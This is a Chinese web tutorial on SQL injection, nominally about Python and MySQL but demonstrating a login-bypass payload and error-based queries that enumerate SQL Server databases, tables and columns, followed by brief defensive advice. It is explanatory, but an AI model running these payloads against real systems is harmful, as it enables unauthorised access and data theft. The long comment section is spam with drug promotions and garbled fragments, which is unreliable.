您的位置 首页 php

Python注入实战:连接mysql防注入干货!

Python 连接 mysql 需要防注入吗?

有的,只要是需要动态生成SQL的,都需要防SQL注入风险,不仅PHP,Python。大多数语言都可能需要注意。

如果不在动态构造 SQL 语句时对变量中特殊字符进行处理,将可能导致程序漏洞、数据盗取、数据破坏等严重的安全问题。网络中有大量讲解 SQL 注入的文章,感兴趣的读者可以搜索相关的资料深入研究。

我这里简单说一下:

execute(self,query, args=None)

Execute a query.

query — string, query to execute on serverargs — optional sequence or mapping, parameters to use with query.

Note: If args is a sequence, then %s must be used as theparameter placeholder in the query. If a mapping is used,%(key)s must be used as the placeholder.

Returns long integer rows affected, if any

Placeholders are supposed to be used for *values*, not other parts of the SQL statement. To insert table names, column names and stuff like that, use Python-level formatting.

虽然有设计,但我们是否有效呢?

Python防SQL注入测试

一、 绕过验证,直接登录

有个登陆框如下:

Python注入实战:连接mysql防注入干货!

可以看到除了账号密码之外,还有一个公司名的输入框,根据输入框的形式不难推出SQL的写法如下:

SELECT * From Table WHERE Name=’XX’ and Password=’YY’ and Corp=’ZZ’

我发现前两者都做一些检查,而第三个输入框却疏忽了,漏洞就在这里!注入开始,在输入框中输入以下内容:

Python注入实战:连接mysql防注入干货!

用户名乱填,密码留空,这种情况下点击登录按钮后竟然成功登录了。

我们看一下最终的SQL就会找到原因:

SELECT * From Table WHERE Name=’SQL inject’ and Password=” and Corp=” or 1=1–‘

从代码可以看出,前一半 单引号 被闭合,后一半单引号被 “–”给注释掉,中间多了一个永远成立的条件“1=1”,这就造成任何字符都能成功登录的结果。而Sql注入的危害却不仅仅是匿名登录。

二、 借助异常获取信息。

现在我们在第三个输入框中写入:“‘ or 1=(SELECT @@version) –”。如下:

Python注入实战:连接mysql防注入干货!

后台的SQL变成了这样:

SELECT * From Table WHERE Name=’SQL inject’ and Password=” and Corp=” or 1=(SELECT @@VERSION)–‘

判断条件变成了 1=(SELECT @@VERSION),这个写法肯定会导致错误,但出错正是我们想要的。点击登录后,页面出现以下信息:

Conversion failed when converting the nvarchar value ‘Microsoft SQL Server 2008 (SP3) – 10.0.5500.0 (X64) Sep 21 2011 22:45:45 Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) ‘ to data type int.

可怕的事情出现了,服务器的操作系统和SQL Server版本信息竟然通过错误显示出来。

获取服务器所有的库名、表名、字段名

接着,我们在输入框中输入如下信息:“t’ or 1=(SELECT top 1 name FROM master..sysdatabases where name not in (SELECT top 0 name FROM master..sysdatabases))–”,此时发现第三个输入框有字数长度的限制,然而这种客户端的限制形同虚设,直接通过Google浏览器就能去除。

Python注入实战:连接mysql防注入干货!

点击登录,返回的信息如下:

Conversion failed when converting the nvarchar value ‘master’ to data type int.

数据库名称“master”通过异常被显示出来!依次改变上面SQL语句中的序号,就能得到服务器上所有数据库的名称。

接着,输入信息如下:“b’ or 1=(SELECT top 1 name FROM master..sysobjects where xtype=’U’ and name not in (SELECT top 1 name FROM master..sysobjects where xtype=’U’))–”

得到返回信息如下:

Conversion failed when converting the nvarchar value ‘spt_fallback_db’ to data type int.

我们得到了master数据库中的第一张表名:“spt_fallback_db”,同上,依次改变序号,可得到该库全部表名。

现在我们以“spt_fallback_db”表为例,尝试获取该表中所有的字段名。在输入框中输入以下代码:

“b’ or 1=(SELECT top 1 master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’spt_fallback_db’);”

于是,得到错误提示如下:

“Conversion failed when converting the nvarchar value ‘xserver_name’ to data type int.”;

这样第一个字段名“xserver_name”就出来了,依次改变序号,就能遍历出所有的字段名。

最终目的–获取数据库中的数据

写到这里,我们已知通过SQL注入能获取全部的数据库,表,及其字段,获取数据的代码就不再描述,而这篇文章的目的也已达到,SQL注入意味着什么?意味着数据库中所有数据都能被盗取。

当知道这个危害以后,是否还能有人对SQL注入漏洞置之不理?

所以,关于安全的问题,给开发者一点建议:

(1)对用户输入的内容要时刻保持警惕,包括输入框,搜索框,url等。

(2)只有客户端的验证等于没有验证。

(3)永远不要把服务器错误信息暴露给用户,不仅仅是404,可能是其他方法。

文章来源:智云一二三科技

文章标题:Python注入实战:连接mysql防注入干货!

文章地址:https://www.zhihuclub.com/79376.shtml

关于作者: 智云科技

热门文章

评论已关闭

41条评论

  1. Not only does this reconstitute the natural NO metabolism in your erectile tissue, but also removes the psychological awkwardness and rebuilds your self-reliance We began to rush through sex so that I would last

  2. Exposure changes of drugs following co-administration with tadalafil are shown in Figure 3

  3. Simply bring the coupon below to the pharmacy, and save on Tadalafil at CVS, Walgreens, Walmart, Safeway, Albertsons, Rite Aid, Target, Kroger, and many other drug stores

  4. ADM and Bungealso reported disappointing earnings for the quarter ended June30 tied to short corn and soybean supplies. There are 6 controlled randomized published trials of varicocele surgery vs.

  5. In women, even lower doses of Anavar are effective and give them desirable results 16USD ml Ciprofloxacin 200 mg 20 ml vial 0

  6. 5R33 CA83231 to Y He was suffering occupational and social impairment, with deficiencies in work, school, family relations, judgment, thinking or mood, as well as depression, anxiety, sleep loss and severe mobility issues

  7. Purerawz also gives you a choice to have any of their products tested at an HPLC licensed facility

  8. Levi RgowpRjmLFdLpPTMJD 6 18 2022 PEI can be added in small quantities to the PEG AM solution contained in chamber 2 of the sprayer, or it can replace PEG AM entirely

  9. The tumor adjacent antral mucosa showed similar signs of mucus metaplasia, coinciding with epithelial hyperplasia and mononuclear cell infiltrates in the lamina propria Fig

  10. cialis alfuzosine biogaran If you can follow instructions then they will like you andthat often means staying very, very late doing ridiculousthings

  11. Serious Use Alternative 1 enzalutamide will decrease the level or effect of calcitriol by affecting hepatic intestinal enzyme CYP3A4 metabolism an erbium YAG laser used at 2940 nm or a CO 2 laser used at 10, 600 nm is combined with drug delivery

  12. 23, was also postponed until the endof the year after bidders balked at DNIT s involvement Natalie nSoHBGtKOaQMPg 6 27 2022

  13. MP A08 and venetoclax treatment exhibits antileukemic activity in primary AML cells in vitro and in vivo Investigation of the formation and accumulation of liver DNA adducts in mice chronically exposed to tamoxifen

  14. Methods Postmenopausal women with previously untreated metastatic disease were randomly assigned, in a 1 1 ratio, to receive either 1 mg of anastrozole orally every day group 1, with crossover to fulvestrant alone strongly encouraged if the disease progressed, or anastrozole and fulvestrant in combination group 2 As shown in Figure 3, both Huaier extract and TAM induced autophagic cell death

  15. As male breast cancer incidence is undoubtedly rising, it would seem sensible to promote this in tandem with pink ribbons as a way of educating the public about the disease in men Additionally, to further enhance tissue targeting specificity, the tamoxifen molecule would preferably be coupled with a targeting molecule such as a microparticle

  16. mometasone mickey securo bristol ri Mr Tyrie warned in a letter yesterday Tues that the Government should not obstruct a review into the separation of RBS into a good bank and a bad bank To measure the ubiquitination of HMGCoAR in cell free systems, 1 Ојg of human recombinant HMGCoAR catalytic domain, GST fusion protein produced in E

  17. celecoxib increases and epinephrine racemic decreases serum potassium He looked at Zhao Ling with what is too high of a blood pressure a gloomy face, and said coldly, You spit out blood Forestry was crystals for hypertension originally inseparable from this matter, but at this moment Zhao Ling directly

  18. Imepitoin treatment flow diagram for decision making during seizure management in an otherwise healthy dog

  19. We people in this industry know very well that the so called defective products are like students who have passed the test ed drug dissolves under tongue with 50 points, but such a large class not only has the test 50 points, 60 points, 80 points, anyway, as long as it is higher than 60 points, we are considered to be passing

  20. The vast majority of patients who undergo tooth extractions or other significant dental procedures suffer no complications

  21. 1998; 273 28378 28383 flurbiprofen rogaine reviews amazon On Saturday, a spokesman for the Tehreek e Taliban criticized Sharif, saying his new government is not serious about holding peace talks

  22. There is an increase in atherosclerosis with DM due to the metabolic syndrome and sedentary lifestyle

  23. She attended school in Rural Hermosa, Creighton and Rapid City, graduating from Rapid City High School in 1951

  24. Some people will not experience consequences from this, but others may develop subsequent resistant infections or pass resistant bugs on to family members

  25. WES was performed on Illumina HiSeq 2000 or HiSeq 2500 paired end and analyzed as described previously Supplementary Materials and Methods; ref

  26. cialis sandoz rosuvastatin vs apo rosuvastatin Гў I donГў t think it was an overstatement at all, Гў Thompson, the only African American running for mayor, said

  27. Bruce Bortz, Publisher, Bancroft Press, Baltimore Unfortunately, these drugs are ineffective at treating prostate cancer

网站地图